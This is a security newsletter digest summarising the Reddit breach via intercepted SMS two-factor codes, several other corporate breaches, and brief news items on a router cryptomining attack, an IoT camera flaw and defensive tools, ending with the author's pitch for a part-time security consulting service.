An attacker compromised employee accounts on Reddit's cloud provider and source code hosting.
The accounts had 2fa enabled, which was based on SMS, and the text messages were intercepted. Solid reminder that SMS 2fa is -not- good enough anymore if you have other options.
The impact from a customer point of view is mostly limited to a old database backup out of May 2007, and digest emails that were sent in June. Seems like it could have been a lot worse.
Some other breaches/leaks this week
- Cosco: one of the worlds largest shipping companies, suffered a ransomware attack.
- Clarkson: another shipping company, had a breach that was disclosed last year, and they've now released more information on what data was breached.
- Dixons Carphone: electronics retailer. Disclosed a breach two months ago but has now announced that it wasn't 1.2 million customers that were impacted, but 10 million.
- Fashion Nexus: an e-commerce company, had an unsecured database with personal details of 1.3 million customers. The database included hashed passwords with salted MD5 and SHA-1.
It sounds very scary, but the attack is hard to execute and limits data extraction to 15-60 bits of data per hour. The researchers say it might be used against high-profile targets, but your average Joe should be safe. The same mitigations that protect against Spectre variant 1 should work here too.
Using a zero-day that was discovered in April of this year, the attackers change the router configuration to inject a Coinhive cryptomining script into users' web traffic.
Another day, another crappy IoT camera service. This one allows you to crawl through serial numbers, using nothing but an HTTP proxy, to view other people's streams.
It's an option you can turn on for your organisation. If Google suspects you are being targeted by a nation-backed attack it will alert you.
Another pretty good overview of things to do to secure your Kubernetes cluster.
Released by the Netflix Security Intelligence and Response Team (SIRT), it takes a baseline host on AWS, compares it to a similar host involved in an incident, and shows security-relevant differences like an unexpected listening port, a strange crontab entry, etc.
Personal note - security officer subscription?
I'm playing with the idea of opening up a "security officer subscription", aimed at companies who can't justify the cost of a full-time security person. For x amount of money you'd get y hours of security work done each month.
Think employee education on 2fa and passwords, taking anti-phishing measures, securing document and e-mail accounts, having backups, working on GDPR, whatever makes sense for the company.
I'm putting out feelers to see if there is any interest in such a thing. If it sounds useful to you or someone you know, please reply to this e-mail :-) Thanks!